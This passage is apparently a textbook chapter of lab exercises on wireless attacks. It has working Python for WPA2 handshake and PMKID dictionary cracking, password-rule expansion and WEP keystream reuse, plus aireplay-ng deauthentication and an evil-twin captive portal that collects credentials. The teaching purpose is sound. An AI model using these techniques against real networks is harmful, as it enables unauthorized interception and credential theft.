Chapter 25 Exercises: Wireless Network Attacks

Authorized Testing Only: All wireless exercises must be performed against your own equipment in a controlled lab environment. Never capture, inject, or interfere with wireless networks you do not own. Unauthorized wireless interception is a criminal offense in most jurisdictions.

Exercise 1: Monitor Mode Configuration

Configure a compatible wireless adapter for monitor mode using both the airmon-ng method and the manual iw method (ip link set <iface> down, iw dev <iface> set type monitor, ip link set <iface> up). Verify monitor mode is active using iwconfig and iw dev. Document any differences between the methods (for example, airmon-ng renames the interface to wlan0mon while iw keeps the name) and troubleshoot common issues, such as NetworkManager or wpa_supplicant resetting the interface; airmon-ng check kill lists and stops those interfering processes.

Difficulty: Beginner Objectives: Master the foundational skill of enabling monitor mode for wireless security testing.

Exercise 2: Passive Wireless Reconnaissance

Using your monitor mode adapter and airodump-ng, perform passive reconnaissance of your lab environment. Identify all visible networks and document: SSID, BSSID, channel, encryption type, cipher, authentication method, signal strength, and connected clients. Create a structured report of your findings.

Difficulty: Beginner Objectives: Practice passive wireless reconnaissance and network documentation.
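The structured report Exercise 2 asks for can be produced directly from airodump-ng's CSV output (written with airodump-ng -w lab --output-format csv). The following Python is an added example, not part of the aircrack-ng suite; the CSV text is constructed to follow the real file's two-section layout (access points, blank line, stations), and the BSSIDs, client MACs and SSIDs are placeholders.

```python
"""Turn airodump-ng's CSV output into an inventory: one record per AP with its
clients attached and a weak-configuration flag, plus the ESSIDs that unassociated
clients are probing for. Added example, not part of the aircrack-ng suite;
SAMPLE_CSV is constructed in the real file's layout."""
import csv
import io
from collections import defaultdict

# Constructed sample (hypothetical BSSIDs/MACs) in airodump-ng's CSV layout.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -41,  120,   0,   0.  0.  0.  0,   7, LabNet1,
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, OPN, , , -67,   80,   0,   0.  0.  0.  0,   9, GuestOpen,
AA:BB:CC:DD:EE:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  11, WEP, WEP, , -75,   30, 512,   0.  0.  0.  0,   6, OldNet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:01, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -50,  300, AA:BB:CC:DD:EE:01, LabNet1
11:22:33:44:55:02, 2024-01-01 10:02:00, 2024-01-01 10:05:00, -60,   20, (not associated), HomeWifi,CoffeeShop
"""


def parse_airodump_csv(text):
    """Return ({bssid: ap_record}, [station_record]) from the two CSV sections."""
    ap_part, _, sta_part = text.partition("\n\n")
    aps, stations = {}, []
    for row in csv.reader(io.StringIO(ap_part), skipinitialspace=True):
        if len(row) < 14 or row[0] == "BSSID":
            continue
        aps[row[0]] = {"bssid": row[0], "channel": int(row[3]), "privacy": row[5],
                       "cipher": row[6], "auth": row[7], "power": int(row[8]),
                       "beacons": int(row[9]), "ivs": int(row[10]), "essid": row[13],
                       "clients": []}
    for row in csv.reader(io.StringIO(sta_part), skipinitialspace=True):
        if len(row) < 6 or row[0] == "Station MAC":
            continue
        # Probed ESSIDs are comma separated, so everything after column 6 belongs to them.
        stations.append({"mac": row[0], "power": int(row[3]), "packets": int(row[4]),
                         "bssid": row[5], "probes": [p for p in row[6:] if p]})
    return aps, stations


def weakness(ap):
    """Short reason if the AP's advertised security is known-weak, else None."""
    if ap["privacy"] == "OPN":
        return "open network: all traffic is cleartext"
    if ap["privacy"] == "WEP":
        return "WEP: key recoverable from captured IVs"
    if "TKIP" in ap["cipher"]:
        return "TKIP: deprecated RC4-based cipher"
    return None


def build_report(aps, stations):
    """Attach clients to their AP, rate each AP, and sort strongest signal first."""
    for sta in stations:
        if sta["bssid"] in aps:
            aps[sta["bssid"]]["clients"].append(sta["mac"])
    for ap in aps.values():
        ap["weak"] = weakness(ap)
    return sorted(aps.values(), key=lambda a: a["power"], reverse=True)


def probe_targets(stations):
    """ESSIDs probed by unassociated clients: the SSIDs an evil twin would impersonate."""
    targets = defaultdict(list)
    for sta in stations:
        if sta["bssid"] == "(not associated)":
            for essid in sta["probes"]:
                targets[essid].append(sta["mac"])
    return dict(targets)


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for ap in build_report(aps, stations):
        print(f"{ap['essid']:<10} {ap['bssid']} ch{ap['channel']:<3} {ap['privacy']:<5} "
              f"{ap['cipher'] or '-':<5} {ap['auth'] or '-':<4} {ap['power']:>4} dBm "
              f"clients={len(ap['clients'])} {ap['weak'] or ''}")
    print("probed by unassociated clients:", probe_targets(stations))
```

The probed-ESSID list is worth keeping in the report: clients that broadcast probe requests for networks that are not present reveal which SSIDs an evil twin (Exercise 6) could impersonate.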

Exercise 3: WPA2 Handshake Capture and Cracking

Set up a dedicated WPA2-PSK access point with a deliberately weak passphrase. Choose one that actually appears in the wordlist you will crack with (grep it in /usr/share/wordlists/rockyou.txt first): a dictionary attack can only recover a passphrase the dictionary contains, so a pattern like "Summer2024!" that is not in the list will never crack. Perform the complete cracking workflow:

  1. Target identification: Use airodump-ng to identify the target AP's BSSID, channel, and connected clients
  2. Focused capture: Lock airodump-ng to the target channel and BSSID, outputting to a capture file
  3. Client deauthentication: Use aireplay-ng to send a small burst of targeted deauthentication frames (for example aireplay-ng -0 1 -a <BSSID> -c <client MAC>) so the client reconnects and performs a fresh handshake; if you can wait, a natural reconnection captures the handshake without transmitting anything
  4. Handshake verification: Confirm the four-way handshake was captured (look for the "WPA handshake: [BSSID]" message in airodump-ng)
  5. CPU cracking: Crack the handshake using aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
  6. GPU cracking: Convert the capture to hashcat's 22000 format with hcxpcapngtool -o hash.hc22000 capture-01.cap and crack with hashcat -m 22000 -a 0 hash.hc22000 rockyou.txt (mode 22000 accepts both EAPOL handshakes and PMKIDs)
  7. Performance comparison: Record the cracking speed (keys/second) for both tools and calculate how long it would take to exhaust the full rockyou wordlist with each

Difficulty: Intermediate Objectives: Understand the complete WPA2 handshake capture and cracking workflow. Expected Outcome: You should observe that GPU-based cracking with hashcat is orders of magnitude faster than CPU-based cracking with aircrack-ng, demonstrating why strong, long passphrases are essential for WPA2-PSK security.

Exercise 4: PMKID Attack Practice

Against your lab access point, attempt to capture the PMKID using hcxdumptool. Convert the capture to hashcat format using hcxpcapngtool and crack it. Note that an AP only includes a PMKID in the first EAPOL message if it supports PMK caching or fast roaming; many consumer APs do not, and if hcxpcapngtool reports no PMKID the attack does not apply to that AP and you fall back to handshake capture. Compare this method with the handshake capture approach in terms of required conditions (no connected client and no deauthentication needed), speed, and stealth.

Difficulty: Intermediate Objectives: Practice the PMKID attack technique and understand its advantages.
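What aircrack-ng and hashcat -m 22000 actually repeat for every wordlist entry in Exercise 3, and how the PMKID attack of Exercise 4 shortens that work, is shown in the following Python. It is an added example, not code from the aircrack-ng, hashcat or hcxtools projects. Because no real capture can be shipped here, make_capture() builds a stand-in from a known passphrase: the AP and client MAC addresses, the nonces and the passphrase "Summer2024!" are assumptions chosen for the demonstration, and in the lab those values come from the .cap/.pcapng file instead.

```python
"""WPA2-PSK key derivation, 4-way-handshake MIC verification and PMKID derivation:
the per-candidate work that aircrack-ng and hashcat -m 22000 repeat for every
wordlist entry. Added example, not code from either project. make_capture()
builds a stand-in for a real capture from a known passphrase; in the lab the
MACs, nonces, EAPOL frame and PMKID come from the .cap/.pcapng file."""
import hashlib
import hmac
import struct
import time


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes): the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk, aa, spa, anonce, snonce):
    """802.11i PRF-512 -> PTK; its first 16 bytes are the KCK that keys the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]


def eapol_mic(kck, eapol):
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol[:81] + b"\x00" * 16 + eapol[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def pmkid(pmk, aa, spa):
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA), carried in message 1's RSN IE."""
    return hmac.new(pmk, b"PMK Name" + aa + spa, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce, mic=b"\x00" * 16):
    """EAPOL-Key message 2 (client -> AP): 802.1X header, RSN descriptor, key info 0x010a
    (HMAC-SHA1 MIC, pairwise, MIC present), replay counter 1, SNonce, zero IV/RSC/ID,
    MIC at offset 81, zero-length key data (the client's RSN IE is omitted for brevity)."""
    body = struct.pack(">BHHQ", 2, 0x010A, 0, 1) + snonce + b"\x00" * 32 + mic + b"\x00\x00"
    return struct.pack(">BBH", 2, 3, len(body)) + body


def make_capture(passphrase, ssid):
    """Constructed capture: hypothetical MACs, fixed nonces, MIC and PMKID from the passphrase."""
    aa = bytes.fromhex("aabbccddee01")           # AP BSSID (hypothetical)
    spa = bytes.fromhex("112233445501")          # client MAC (hypothetical)
    anonce = hashlib.sha256(b"anonce").digest()  # 32-byte nonces, fixed for reproducibility
    snonce = hashlib.sha256(b"snonce").digest()
    pmk = derive_pmk(passphrase, ssid)
    kck = prf512(pmk, aa, spa, anonce, snonce)[:16]
    eapol = build_eapol_msg2(snonce)
    eapol = eapol[:81] + eapol_mic(kck, eapol) + eapol[97:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "pmkid": pmkid(pmk, aa, spa)}


def crack_handshake(wordlist, cap):
    """Handshake attack: needs both nonces and message 2, so a client had to (re)connect."""
    captured = cap["eapol"][81:97]
    for candidate in wordlist:
        kck = prf512(derive_pmk(candidate, cap["ssid"]), cap["aa"], cap["spa"],
                     cap["anonce"], cap["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, cap["eapol"]), captured):
            return candidate
    return None


def crack_pmkid(wordlist, cap):
    """PMKID attack: no client, no nonces, and one HMAC less per candidate than the handshake."""
    for candidate in wordlist:
        derived = pmkid(derive_pmk(candidate, cap["ssid"]), cap["aa"], cap["spa"])
        if hmac.compare_digest(derived, cap["pmkid"]):
            return candidate
    return None


def pbkdf2_rate(ssid="LabNet1", n=200):
    """Candidates per second for the PBKDF2 step alone on this CPU, single threaded."""
    start = time.perf_counter()
    for i in range(n):
        derive_pmk(f"candidate{i:08d}", ssid)
    return n / (time.perf_counter() - start)


if __name__ == "__main__":
    cap = make_capture("Summer2024!", "LabNet1")
    words = ["password", "letmein", "Summer2024!", "Winter2024!"]   # constructed mini-wordlist
    print("handshake crack:", crack_handshake(words, cap))
    print("PMKID crack:    ", crack_pmkid(words, cap))
    rate = pbkdf2_rate()
    print(f"{rate:.0f} PBKDF2/s here; ~14.3M rockyou entries would take ~{14_300_000 / rate / 3600:.1f} h")
```

The rate printed at the end is the number to compare with the keys/second figures from step 7 of Exercise 3: the 4096-iteration PBKDF2 dominates the per-candidate cost in both attacks, which is exactly the operation a GPU parallelizes and the reason passphrase length, not the capture method, decides whether the crack succeeds.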

Exercise 5: Custom Wordlist Generation

Create a targeted wordlist for cracking a Wi-Fi password. Use tools such as crunch, CeWL, and John the Ripper rules to generate passwords based on common patterns: organization name + year, seasonal passwords, keyboard patterns, and common substitutions. Test your wordlist against a lab AP configured with a password following one of these patterns.

Difficulty: Intermediate Objectives: Develop skills in creating effective custom wordlists for wireless cracking.

Exercise 6: Evil Twin Attack Lab

Set up a complete evil twin attack against your own open test network:

  1. Configure the rogue AP: Use hostapd to create an AP with the same SSID as your test network. Configure it on a different channel initially, then on the same channel
  2. Set up DHCP and DNS: Use dnsmasq to provide DHCP addresses to connecting clients and redirect DNS queries to your captive portal
  3. Create a captive portal: Build a simple web page mimicking a hotel or coffee shop login page. Use Python's http.server or Flask to serve it. The portal should collect credentials and redirect to a "connected" page
  4. Force client migration: Use deauthentication frames against your test network to push clients toward the evil twin
  5. Capture and analyze: Connect a test device (phone or laptop) to the evil twin and observe the traffic flow. Examine what data is transmitted in cleartext
  6. Detection analysis: Identify the specific indicators a WIDS would use to detect this attack: the known SSID being advertised by a BSSID that is not on the authorized list, beacons for that SSID on an unexpected channel, a rogue BSSID whose vendor OUI does not match the real infrastructure, and the burst of deauthentication frames that precedes client migration

Difficulty: Intermediate Objectives: Understand evil twin attack mechanics and detection methods. Important: Configure iptables/nftables to masquerade (NAT) traffic from the evil twin's interface to your uplink so that clients connecting to it still reach the internet through your test machine. A rogue AP that breaks connectivity is abandoned by its victims within seconds, which is why a realistic assessment scenario keeps the path working.

Exercise 7: Wireless Packet Analysis with Wireshark

Capture wireless traffic (in monitor mode) and analyze it in Wireshark. Identify and examine: beacon frames, probe requests/responses, authentication frames, association frames, deauthentication frames, and the four-way handshake. Create annotated screenshots showing each frame type and its key fields.

Difficulty: Intermediate Objectives: Develop deep understanding of 802.11 frame types through packet analysis.

Exercise 8: Hashcat Rule Development

Create custom hashcat rules optimized for Wi-Fi password cracking. Develop rules that implement common password patterns: capitalize first letter + append digits, leet speak substitutions, append special characters, and prepend common words. Preview what a rule set generates with hashcat --stdout -r <rules> <wordlist> before spending GPU time on it. Test your rules against a lab AP with a moderately complex password. Measure the performance impact of different rule sets (candidates per second and total candidates generated).

Difficulty: Advanced Objectives: Master advanced password cracking techniques for wireless assessments.
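The pattern-based wordlist of Exercise 5 and the rule sets of Exercise 8 are two halves of the same thing: base words times transformations. The following Python is an added example that implements a subset of the hashcat/John rule language and a seasonal/organization base-word generator so both can be explored offline; it is not hashcat's own rule engine, supports only the functions handled in apply_rule, and the organization names, years and rule file are constructed for the demonstration.

```python
"""A small interpreter for the hashcat/John rule syntax covering the patterns named
in Exercises 5 and 8 (capitalize + append digits, leet substitutions, appended
symbols, prepended words), plus a generator of seasonal/organization base words.
Added example: not hashcat's engine and limited to the functions below; run real
rule files with `hashcat -m 22000 -a 0 -r wifi.rule hash.hc22000 base.txt`."""
import itertools

# Single-character rule functions that take no argument.
SIMPLE = {
    "l": str.lower, "u": str.upper, "t": str.swapcase,
    "c": lambda w: w[:1].upper() + w[1:].lower(),   # capitalize first, lower the rest
    "C": lambda w: w[:1].lower() + w[1:].upper(),   # invert capitalize
    "r": lambda w: w[::-1],                         # reverse
    "d": lambda w: w + w,                           # duplicate
    "]": lambda w: w[:-1],                          # delete last character
    "[": lambda w: w[1:],                           # delete first character
    "{": lambda w: w[1:] + w[:1],                   # rotate left
    "}": lambda w: w[-1:] + w[:-1],                 # rotate right
}


def apply_rule(word: str, rule: str) -> str:
    """Apply one rule line to a word. Functions may be written back to back or space separated."""
    w, i = word, 0
    while i < len(rule):
        f = rule[i]
        i += 1
        if f in " :":                                      # separator / no-op
            continue
        if f in SIMPLE:
            w = SIMPLE[f](w)
        elif f == "$":                                     # $X: append X
            w, i = w + rule[i], i + 1
        elif f == "^":                                     # ^X: prepend X
            w, i = rule[i] + w, i + 1
        elif f == "s":                                     # sXY: replace every X with Y
            w, i = w.replace(rule[i], rule[i + 1]), i + 2
        else:
            raise ValueError(f"unsupported rule function {f!r} in {rule!r}")
    return w


def expand(words, rules):
    """Cross product of words and rules in hashcat's -a 0 -r order, deduplicated."""
    seen, out = set(), []
    for word, rule in itertools.product(words, rules):
        candidate = apply_rule(word, rule)
        if candidate not in seen:
            seen.add(candidate)
            out.append(candidate)
    return out


def load_rules(text):
    """Rule file syntax: one rule per line; '#' comment lines and blank lines are ignored."""
    return [line.strip() for line in text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")]


def base_words(org_names, years=range(2020, 2026)):
    """Exercise 5 stems: organization names and seasons, bare and with a year, plus keyboard walks."""
    seasons = ["spring", "summer", "autumn", "fall", "winter"]
    stems = [name.lower() for name in org_names] + seasons
    keyboard = ["qwerty", "qwertyuiop", "1qaz2wsx", "zaq12wsx", "asdfgh"]
    return stems + [f"{stem}{year}" for stem in stems for year in years] + keyboard


# Constructed rule file covering the patterns named in Exercises 5 and 8.
WIFI_RULES = load_rules("""
# keep the word, capitalize, capitalize + digits / symbol
:
c
c $1
c $1 $2 $3
c $!
# summer -> Summer2024!
c $2 $0 $2 $4 $!
# stem already carries a year: summer2024 -> summer2024! / Summer2024!
$!
c $!
# leet: password -> p@$$w0rd
sa@ se3 so0 ss$
c sa@ se3 so0 ss$
# prepend words one character at a time, last character first
^i ^f ^i ^w
^- ^t ^s ^e ^u ^g
""")


if __name__ == "__main__":
    words = base_words(["Acme", "AcmeCorp"])
    candidates = expand(words, WIFI_RULES)
    print(f"{len(words)} stems x {len(WIFI_RULES)} rules -> {len(candidates)} unique candidates")
    print("\n".join(candidates[:12]))
```

Writing candidates to a file and feeding it to hashcat -a 0 is equivalent to passing the stems with -r, but the rule form is what you want on a GPU: the expansion happens on the device and the stem list stays small enough to fit in memory.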

Exercise 9: BLE Device Enumeration

Using a Bluetooth-capable adapter, perform a comprehensive BLE security assessment:

  1. Discovery: Use bluetoothctl (scan on, then devices) or the older hcitool lescan (deprecated in BlueZ 5 but still widely documented) to discover BLE devices in range. Record the address, the address type (public or random, as shown by bluetoothctl info), device name, and advertised services for each device
  2. Service enumeration: For a target device (use a device you own, such as a fitness tracker, smart light, or BLE-enabled Arduino), use gatttool (also deprecated in BlueZ 5; bluetoothctl's gatt menu is the replacement) or nRF Connect (mobile app) to enumerate all GATT services and characteristics
  3. Read characteristics: Attempt to read all readable characteristics. Identify what data is exposed (device name, battery level, sensor data, configuration)
  4. Write test: Identify writable characteristics and test whether they require authentication. On your own devices, attempt to modify configuration values
  5. Traffic capture: If you have a BLE sniffer (such as an Ubertooth or nRF52840 dongle), capture BLE traffic between the device and its companion app. Analyze the traffic for plaintext data, static keys, or replay-vulnerable commands
  6. Security assessment report: For each finding, rate the severity and recommend mitigations

Difficulty: Intermediate Objectives: Gain practical experience with BLE security assessment. Equipment Needed: A Linux system with a Bluetooth adapter (most built-in adapters work for basic enumeration), a target BLE device you own, and optionally a BLE sniffer for traffic capture.
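Step 1 of Exercise 9 records what a device advertises, and the advertising payload is a simple length-prefixed format worth decoding by hand once. The following Python is an added example, not BlueZ code: it parses a constructed advertising payload into flags, 16-bit service UUIDs, local name, TX power and manufacturer data, and classifies the advertiser's address type, which determines whether the device can be tracked across sessions. The sample payload, the device name "LabTrack" and the addresses are constructed; the UUID and company-ID tables cover only a handful of assigned numbers.

```python
"""Decode a BLE advertising payload (the bytes behind a bluetoothctl/hcitool lescan
line) into its AD structures, and classify the advertiser's address type.
Added example, not BlueZ code; SAMPLE_ADV and the addresses are constructed."""
import struct

SERVICE_UUID16 = {0x1800: "Generic Access", 0x1801: "Generic Attribute",
                  0x180A: "Device Information", 0x180D: "Heart Rate",
                  0x180F: "Battery Service", 0x1812: "Human Interface Device"}
COMPANY_ID = {0x0006: "Microsoft", 0x004C: "Apple", 0x0059: "Nordic Semiconductor"}
FLAG_BITS = ((0x01, "LE limited discoverable"), (0x02, "LE general discoverable"),
             (0x04, "BR/EDR not supported"))

# Constructed 26-byte payload: flags | 16-bit UUID list | complete local name | TX power | manufacturer data
SAMPLE_ADV = bytes.fromhex(
    "02 01 06"                      # Flags: general discoverable, BR/EDR not supported
    "03 03 0f 18"                   # Complete list of 16-bit UUIDs: 0x180F Battery Service
    "09 09 4c 61 62 54 72 61 63 6b" # Complete local name: "LabTrack"
    "02 0a 00"                      # TX power: 0 dBm
    "05 ff 59 00 01 02"             # Manufacturer data: company 0x0059, payload 01 02
)


def parse_ad_structures(payload: bytes):
    """Yield (ad_type, data) for each length-prefixed AD structure; a zero length ends the payload."""
    i = 0
    while i < len(payload) and payload[i] != 0:
        length = payload[i]
        if i + 1 + length > len(payload):
            raise ValueError(f"truncated AD structure at offset {i}")
        yield payload[i + 1], payload[i + 2:i + 1 + length]
        i += 1 + length


def decode_advertisement(payload: bytes) -> dict:
    adv = {"flags": [], "services": [], "name": None, "tx_power": None, "manufacturer": None}
    for ad_type, data in parse_ad_structures(payload):
        if ad_type == 0x01:                          # Flags
            adv["flags"] = [label for bit, label in FLAG_BITS if data[0] & bit]
        elif ad_type in (0x02, 0x03):                # incomplete/complete list of 16-bit UUIDs (LE)
            adv["services"] += [SERVICE_UUID16.get(u, f"0x{u:04X}")
                                for (u,) in struct.iter_unpack("<H", data)]
        elif ad_type in (0x08, 0x09):                # shortened/complete local name
            adv["name"] = data.decode("utf-8", "replace")
        elif ad_type == 0x0A:                        # TX power level, signed dBm
            adv["tx_power"] = struct.unpack("<b", data)[0]
        elif ad_type == 0xFF:                        # manufacturer specific: company ID (LE) + bytes
            (cid,) = struct.unpack("<H", data[:2])
            adv["manufacturer"] = (COMPANY_ID.get(cid, f"0x{cid:04X}"), data[2:].hex())
    return adv


def classify_address(mac: str, addr_type: str) -> str:
    """addr_type is 'public' or 'random' as BlueZ reports it. A random address is typed by the
    top two bits of its first byte; only the private kinds rotate and resist passive tracking."""
    if addr_type == "public":
        return "public (fixed IEEE address; trackable)"
    top = int(mac.split(":")[0], 16) >> 6
    return {0b11: "static random (fixed; trackable)",
            0b01: "resolvable private (rotates; needs the IRK to track)",
            0b00: "non-resolvable private (rotates)"}.get(top, "reserved")


if __name__ == "__main__":
    adv = decode_advertisement(SAMPLE_ADV)
    for key, value in adv.items():
        print(f"{key:<13} {value}")
    for mac, kind in (("C4:11:22:33:44:55", "random"), ("5A:11:22:33:44:55", "random")):
        print(mac, "->", classify_address(mac, kind))
```

Record the address classification in the assessment report: a device that advertises a public or static random address with a readable name and a fitness or health service UUID is identifiable and trackable by anyone in radio range before any GATT connection is made.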

Exercise 10: Wireless IDS Evaluation

Install and configure Kismet as a wireless IDS in your lab. Generate various wireless attacks (deauthentication floods, rogue AP, probe request floods) and evaluate Kismet's detection capabilities. Document which attacks are detected, the alert details, and any false positive/negative observations.

Difficulty: Intermediate Objectives: Understand wireless intrusion detection capabilities and limitations.

Exercise 11: WEP Cracking Exercise

Configure an old router (or a virtual AP that supports WEP) with WEP encryption. Perform a complete WEP cracking attack using the aircrack-ng suite: monitor, capture, inject ARP requests (aireplay-ng's ARP replay recognizes encrypted ARP frames by their fixed size and replays them so the AP emits fresh IVs), and crack the key. Measure how many IVs are needed and how long the process takes; aircrack-ng's default PTW attack typically succeeds with tens of thousands of unique IVs, where the older FMS/KoreK statistical attacks needed hundreds of thousands or more. Document why WEP is fundamentally broken: a 24-bit IV that repeats quickly, RC4 keyed directly with IV || secret, and a CRC32 integrity check that is linear and offers no protection against bit flipping.

Difficulty: Beginner Objectives: Understand the historical context of WEP vulnerabilities through practical demonstration.
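The weakness the exercise asks you to document can be shown in a few dozen lines. The following Python is an added example (a toy WEP encryptor, not the PTW key-recovery attack aircrack-ng runs): it demonstrates that reusing a 24-bit IV reuses the RC4 keystream, so one frame with known plaintext decrypts any other frame sent under that IV without the key, and it computes how soon IV reuse is expected. The 40-bit key, the IV, the ARP request (whose addresses the attacker is assumed to know or guess on a lab /24) and the second frame are constructed.

```python
"""Why WEP is broken, in code: the per-frame RC4 key is IV || secret with a 24-bit IV,
so whenever an IV repeats the keystream repeats, and one frame with known plaintext
(an ARP request is almost entirely predictable) decrypts every other frame sent
under that IV. Added example (toy WEP encryptor, not aircrack-ng's PTW key recovery);
secret key, IV and frames are constructed."""
import math
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus keystream generation, returning `length` keystream bytes."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV(3) | key index(1) | RC4(IV || secret) XOR (plaintext || CRC32 ICV)."""
    body = plaintext + struct.pack("<I", zlib.crc32(plaintext))
    return iv + b"\x00" + xor(body, rc4(iv + secret, len(body)))


def wep_decrypt(secret: bytes, frame: bytes) -> bytes:
    iv, ct = frame[:3], frame[4:]
    body = xor(ct, rc4(iv + secret, len(ct)))
    plaintext, icv = body[:-4], body[-4:]
    if struct.pack("<I", zlib.crc32(plaintext)) != icv:
        raise ValueError("ICV mismatch: wrong key or corrupted frame")
    return plaintext


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Keystream for this frame's IV = ciphertext XOR (known plaintext || its computable ICV)."""
    known_body = known_plaintext + struct.pack("<I", zlib.crc32(known_plaintext))
    return xor(frame[4:4 + len(known_body)], known_body)


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt the first len(keystream) bytes of any frame reusing the same IV; no key needed."""
    return xor(frame[4:4 + len(keystream)], keystream)


def expected_frames_until_iv_repeat() -> float:
    """Birthday bound for randomly chosen 24-bit IVs: about sqrt(pi/2 * 2^24), roughly 5100 frames."""
    return math.sqrt(math.pi / 2 * 2 ** 24)


# Constructed lab values: a 40-bit WEP key, one IV, and two frames that reuse it.
SECRET = bytes.fromhex("0102030405")
IV = bytes.fromhex("112233")
# LLC/SNAP header + ARP request (hw type 1, proto 0x0800, lengths 6/4, opcode 1): every field is
# predictable except the addresses, assumed known or guessed on a lab /24 (hypothetical values).
ARP_REQUEST = (bytes.fromhex("aaaa030000000806") + bytes.fromhex("0001080006040001")
               + bytes.fromhex("aabbccddee01") + bytes([192, 168, 1, 1])
               + bytes(6) + bytes([192, 168, 1, 20]))
ARP_FRAME = wep_encrypt(SECRET, IV, ARP_REQUEST)
SECRET_PAYLOAD = bytes.fromhex("aaaa030000000800") + b"GET /login?user=alice&pw=hunter2"
DATA_FRAME = wep_encrypt(SECRET, IV, SECRET_PAYLOAD)   # same IV: same keystream


if __name__ == "__main__":
    keystream = recover_keystream(ARP_FRAME, ARP_REQUEST)
    print("keystream bytes recovered from the ARP frame:", len(keystream))
    print("second frame decrypted without the key:", decrypt_with_keystream(DATA_FRAME, keystream)[8:])
    print(f"expected frames until an IV repeats: {expected_frames_until_iv_repeat():.0f}")
```

Key recovery itself (what aircrack-ng does once enough IVs are captured) exploits statistical biases in the first RC4 output bytes for related keys and is not reproduced here; the point of this example is that even without the key, the protocol's IV handling leaks plaintext on a busy network within minutes.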

Exercise 12: Wireless Security Audit Checklist

Develop a comprehensive wireless security audit checklist suitable for a professional assessment. Include checks for: encryption standards, authentication methods, rogue AP detection, signal leakage, guest network isolation, WIDS deployment, client configuration, and physical AP security. Apply your checklist to your own wireless environment.

Difficulty: Intermediate Objectives: Develop professional wireless security assessment methodology.

Exercise 13: Deauthentication Attack Analysis

Perform a controlled deauthentication attack against your lab network using aireplay-ng. Simultaneously, capture the deauth frames with Wireshark on a monitoring interface. Analyze the captured frames to understand the attack mechanism: the frames are unauthenticated management frames that any station can forge with the AP's address, and aireplay-ng sends them with reason code 7. Then configure 802.11w Protected Management Frames on your AP (ieee80211w=2 in hostapd, meaning required, and clients that support it) and attempt the attack again. Document the difference: with PMF, deauthentication and disassociation frames are integrity protected, so the forged ones are discarded by the client.

Difficulty: Intermediate Objectives: Understand deauthentication attacks and the protection provided by 802.11w/WPA3.

Exercise 14: Wireless Network Heatmap

Using a wireless analysis tool and a laptop, conduct a basic wireless site survey of your lab space. Map signal strength at various locations and create a simple coverage heatmap. Identify areas where the signal extends beyond the intended coverage area (signal leakage) and recommend physical security mitigations.

Difficulty: Beginner Objectives: Understand wireless signal propagation and physical security considerations.

Exercise 15: WiFi Security Protocol Comparison Report

Write a detailed technical comparison of WEP, WPA-TKIP, WPA2-CCMP, and WPA3-SAE. For each protocol, document: the encryption algorithm, key management, authentication mechanism, known vulnerabilities, attack difficulty, and current recommendation status. Include a decision matrix for organizations choosing wireless security protocols.

Difficulty: Intermediate Objectives: Develop comprehensive understanding of wireless security protocol evolution.

Exercise 16: Bettercap Wireless Module Exploration

Install Bettercap and explore its wireless modules in a lab environment. Use it to perform wireless reconnaissance, client probing, and deauthentication testing. Compare Bettercap's capabilities with the aircrack-ng suite and document the advantages and limitations of each toolset.

Difficulty: Intermediate Objectives: Gain familiarity with alternative wireless security testing tools.

Exercise 17: Wireless Penetration Test Report

Conduct a complete wireless security assessment of your lab environment and write a professional penetration test report. Include: scope definition, methodology, findings with severity ratings, evidence, risk analysis, and prioritized remediation recommendations. Follow industry-standard report formatting.

Difficulty: Advanced Objectives: Develop end-to-end wireless assessment and reporting skills.

Exercise 18: Enterprise Wireless Attack Simulation

Set up a WPA2-Enterprise lab environment and practice attacking it:

Lab Setup:

  1. Install FreeRADIUS on a Linux VM and configure it for EAP-PEAP with MSCHAPv2 as the inner authentication method
  2. Configure a test AP to use WPA2-Enterprise (802.1X) with the RADIUS server
  3. Create test user accounts in FreeRADIUS

Attack Sequence:

  1. Credential capture with hostapd-wpe: Deploy a rogue AP using hostapd-wpe (Wireless Pwnage Edition) configured with the same SSID as the enterprise network. Its built-in RADIUS server presents a self-signed certificate
